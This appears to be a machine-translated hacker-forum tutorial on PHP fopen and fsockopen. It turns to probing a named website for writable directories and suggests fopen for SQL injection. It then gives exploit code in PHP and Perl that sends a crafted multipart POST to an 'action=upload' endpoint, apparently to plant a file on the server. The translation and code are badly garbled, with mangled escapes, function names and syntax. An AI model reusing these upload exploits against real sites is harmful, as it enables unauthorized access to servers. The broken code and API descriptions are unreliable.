The previous paragraph talks about the operation of the command line. Please refer to more
http://www.php.net/manual/en/features.commandline.php
1.FOpen application
Fopen can also be referred to as a packaged socket function. Not only used for file reading, but also for socket. FOPEN is equivalent to other advanced INET controls / classes, which is more advanced for URL operations than fsockinken.
How to use FOPEN
$ S = FOPEN ($ URL, MODE);
FOPEN's Mode property:
Mode description
The 'R' read-only mode opens, pointing the file pointer to the file header.
The 'R ' Read and write mode opens, and the file pointer points to the file header.
'W' write mode opens, pointing the file pointer to the file header and intercepts the file size zero. If the file does not exist, try to create it.
The 'W ' read and write mode opens, pointing the file pointer to the file header and cutting the file size zero. If the file does not exist, try to create it.
The 'A' write is opened, and the file pointer points to the end of the file. If the file does not exist, try to create it.
The 'A ' read and write mode opens, pointing the file pointer to the end of the file. If the file does not exist, try to create it.
'X' creation and opens in mode, pointing the file pointer to the file header. If the file already exists, the fopen () call failed and returned False and generated an E_WARNING level error message. If the file does not exist, try to create it. This is the equivalent of the OPEN (2) system call to the underlying Open (2) system. This option is supported by PHP 4.3.2 and later versions, only for local files.
'X ' creates and opens the read and write mode, pointing the file pointer to the file header. If the file already exists, the fopen () call failed and returned False and generated an E_WARNING level error message. If the file does not exist, try to create it. This is the equivalent of the OPEN (2) system call to the underlying Open (2) system. This option is supported by PHP 4.3.2 and later versions, only for local files.
That is, the operation of the local file can also be used for inet. Is it very kool?
If you want to test a station's IIS directory is written.
Can write this way
$ S = fopen ("
http://www.bugkidz.org "," x ") or Die (" There is no write permission ")
If you exist, you can continue to construct the following statement. Write files remotely with FWRITE.
But the general website is read-only.
$ S = fopen ("
http://www.bugkidz.org/index.php?id=1""r ");
This will be read.
Http://www.bugkidz.org/index.php?id=1, but it has to be processed to get the full file content
such
While (! Feof ($ s)) {
Echo fgets ($ S, 1024);
}
I think fopen is the most convenient for SQL INJECTION.
Quote
Function PHPINET ($ URL) {FOPEN ($ URL, "R") or Die ("Open URL Error"); $ ca H = ""; While (! Feof ($ s)) {$ cahe. = fgets ($ S , 1024);} Retrun $ cahe; fclose ($ s);}
This function is equivalent to the use of FSockOpen, which is the use of funnes in VB, is also a piece of Socket function that is packaged. It is a bit similar to the Winsock control in VB. Unfortunately, it supports active socket connection, does not support BIND, LISTEN, etc. If you need to implement these features, you should use advanced Socket programming in PHP. Even so, the fsockopen function can also meet most of the needs. This uses fsockopenresource fsockopen (String Target, int port [, int errno [, string errstr [, float timeout]]): $ sock = fsockopen ("192.168.0.1", 80, $ errno, $ Errstr, 30); The front 2 is the address and port, the middle 2 is related to the wrong variable, and finally Timeout is set. Usually $ sock = fsockopen ("192.168.0.1", 80); so. $ SOCK = FSOCKOPEN ("192.168.0.1", 80); this is a typical TCP connection. UDP is connected to $ sock = fsockopen ("udp: //192.168.0.1", 53); use this to write a TFTP client is also possible. Fsockopen Application Example: Examples First, Simple HTTP Session. Code process is usually the establishment of FSOCKOPEN resources, definition sends Content, write definition content with fwrite functions or FPUTS functions, and the output of the line is available until the FGETS function is used until the end of the file is reached. Use fclose to close the established FsockOpen resource. Angel wrote a PHP port scan tool, posted http://www.4ngel.net/Article/20.htm Select Fsockopen to write simple Exp Send frames is definitely a goodidea. Becoz it's so easy. Look at my PHP upload vulnerability EXP. Code reference
/ R / N "." ---------------------------- 7D41F4A600472 - / R / N "." / r / n " ; $ header = "post /index.php?action=upload http / 1.1 / r / n". "Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application / msword, Application / X-ShockWave-Flash, * / * / r / n "." REFERER: http://127.0.0.1/index.php?path=./r/n"."accept-language: en-cn / r / n "." Content-Type: Multipart / Form-Data; Boundary = ------------------------ 7D41F4A600472 / R / N ". "Accept-encoding: gzip, deflate / r / n". "User-agent: mozilla / 4.0 (compatible; msie 6.0; windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322) / R / N". "HOS T: 127.0.0.1/r/n"."content-length: Strlen ($ BODY) / R / N "." Connection: Keep-Alive / R / N "." Cache-Control: no-cache / r / N "." cookie: phpsessid = 111111111111111111111111111111111111111111111111 / r / n "." / r / n "; FPUTS ($ SOCK, $ header); Sleep (1); FPUTS ($ SOCK, $ Body); while (! feof) $ SOCK) {Echo Fgets ($ SOCK, 128);} fclose ($ suck); "Let's see the EXP code written by Perl with Perl.
Quote
#! / usr / bin / perl $ | = 1; Use socket; $ host = "127.0.0.1"; $ port = "80"; $ uploadto = "; $ str =" -------- -------------------- 7D41F4A600472 / R / N "." Content-Disposition: form-data; name = / "PATH /" / R / N ". "/R/n"www.ppp�/R/N" "----------------------------7D41F4A600472 /R/n"."content-disposition: form-data; name = / "image /"; filename = / "f: //tools//1.gif/" / r / n "." Content-Type: TEXT / PLAIN / R / N "." / r / n "." "?> / r / n". "?> / r / n". "- ---------------------------- 7D41F4A600472 - / R / N "." / R / n "; Print $ Str; $ LEN = Length ($ STR); Print $ LEN; $ REQ = "Post / 1/1/3721/index.php?action=upload http / 1.1 / r / n". "Accept: image / gif, image / x- Xbitmap, Image / JPEG, Image / Pjpeg, Application / MSWORD, Application / X-ShockWave-Flash, * / * / R / N "." Referer: http://127.0.0.1/index.php?path=./ R / N "." accept-language: en-cn / r / n "." Content-type: multipart / form-data; boundary = ------------------------------------------------------------------------------------------------------ -------- 7D41F4A600472 / R / N "." Accept-encoding: gzip, deflate / r / n "." User-agent: mozilla / 4.0 (compatible; msie 6.0; windows NT 5.2; Hotbar 4.4 .6.0; .NET CL R 1.1.4322) / r / n "." Host: 127.0.0.1/r/n "" "in", "," CACHE "." Cache "." Cache "." Cache "." Cache "." Cache "." Cache "." Cache "." Cache ". -Control: no-cache / r / n "." Cookie: phpsessid = 11111111111111111111111111/ r / n "." $ Str / r / n / r / n "; Print $ Req; @res = Sendraw; Print @res; #hmm ... Maybe you can send it by other way sub sendraw {my ($ reg) = @_; my $ target; $ target = inet_aton ($ host) || DIE ("INET_ATON ProBLEMS / N");
Socket (S, PF_INET, SOCK_STREAM, GETPROTOBYNAME ('TCP') || 0) || DIE ("socket problems / n"); if (Connect (S, Pack "SNA4x8", 2, $ Port, $ Target)) {SELECT (S); $ | = 1; Print $ Req; My @res = ; select (stdout); close (s); return @res; else {Die ("CAN't connect ... / N ");} Who is simpler, a glimpse. You may have a certain understanding of the use of Fsockopen. Next time I will talk about PHP-Sockets Advanced Programming. A more powerful PHP will be surprised
